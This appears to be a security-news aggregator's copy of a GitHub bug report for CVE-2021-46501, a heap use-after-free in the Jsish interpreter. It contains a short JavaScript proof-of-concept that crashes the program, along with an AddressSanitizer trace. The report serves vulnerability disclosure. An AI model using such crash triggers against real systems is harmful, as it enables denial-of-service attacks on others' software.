Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46501: Heap-use-after-free src/jsiArray.c:958 in SortSubCmd · Issue #86 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via SortSubCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

CVE
#vulnerability#mac#ubuntu#linux#dos#js#git

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

Comments

@hope-fly

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

var JSEtest = [ 'aa’, 'bb’, ‘cc’ ]; var results = JSEtest; JSEtest.findIndex(function (kV) { JSEtest.sort(function (str, position) { results.push(kV); }); });

Execution steps & Output

$ ./jsish/jsish poc.js ==106201==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000018678 at pc 0x56468deff5a0 bp 0x7fff9a37c2a0 sp 0x7fff9a37c290 READ of size 8 at 0x60c000018678 thread T0 #0 0x56468deff59f in SortSubCmd src/jsiArray.c:958 #1 0x7fb68d0b0311 (/lib/x86_64-linux-gnu/libc.so.6+0x42311) #2 0x7fb68d0b027d (/lib/x86_64-linux-gnu/libc.so.6+0x4227d) #3 0x7fb68d0b027d (/lib/x86_64-linux-gnu/libc.so.6+0x4227d) #4 0x7fb68d0b06b5 in qsort_r (/lib/x86_64-linux-gnu/libc.so.6+0x426b5) #5 0x56468df02611 in jsi_ArraySortCmd src/jsiArray.c:1065 #6 0x56468decf818 in jsi_FuncCallSub src/jsiProto.c:244 #7 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796 #8 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837 #9 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264 #10 0x56468e1ad15e in jsi_evalcode src/jsiEval.c:2204 #11 0x56468ded0834 in jsi_FuncCallSub src/jsiProto.c:220 #12 0x56468de4cfec in jsi_FunctionInvoke src/jsiFunc.c:777 #13 0x56468de4cfec in Jsi_FunctionInvoke src/jsiFunc.c:789 #14 0x56468df0dc0b in jsi_ArrayFindSubCmd src/jsiArray.c:576 #15 0x56468df0dc0b in jsi_ArrayFindIndexCmd src/jsiArray.c:666 #16 0x56468decf818 in jsi_FuncCallSub src/jsiProto.c:244 #17 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796 #18 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837 #19 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264 #20 0x56468e1ad15e in jsi_evalcode src/jsiEval.c:2204 #21 0x56468e1b1274 in jsi_evalStrFile src/jsiEval.c:2665 #22 0x56468dea066a in Jsi_Main src/jsiInterp.c:936 #23 0x56468e6a503a in jsi_main src/main.c:47 #24 0x7fb68d08fbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #25 0x56468de34969 in _start (/usr/local/bin/jsish+0xe8969)

0x60c000018678 is located 56 bytes inside of 128-byte region [0x60c000018640,0x60c0000186c0) freed by thread T0 here: #0 0x7fb68dcfef30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x56468dea5972 in Jsi_Realloc src/jsiUtils.c:47

previously allocated by thread T0 here: #0 0x7fb68dcfef30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x56468dea5972 in Jsi_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiArray.c:958 in SortSubCmd Shadow bytes around the buggy address: 0x0c187fffb070: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fffb080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c187fffb090: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c187fffb0a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fffb0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c187fffb0c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd[fd] 0x0c187fffb0d0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fffb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fffb0f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c187fffb100: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c187fffb110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==106201==ABORTING

1 participant

@hope-fly

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907